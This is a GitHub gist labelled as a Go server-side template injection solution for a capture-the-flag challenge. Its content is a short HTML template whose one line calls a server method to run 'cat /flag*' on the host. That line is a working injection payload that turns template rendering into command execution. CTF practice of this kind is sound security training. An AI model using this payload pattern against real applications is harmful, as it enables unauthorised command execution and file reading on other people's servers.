Skip to content

Instantly share code, notes, and snippets.

@davidhamann
Created November 21, 2023 23:28
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save davidhamann/0c7047bdad2a2469fa1daf9f4c400dc0 to your computer and use it in GitHub Desktop.
Save davidhamann/0c7047bdad2a2469fa1daf9f4c400dc0 to your computer and use it in GitHub Desktop.
Go SSTI, CTF challenge
<!DOCTYPE html>
<html>
<body>
{{.FetchServerInfo "cat /flag*"}}
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment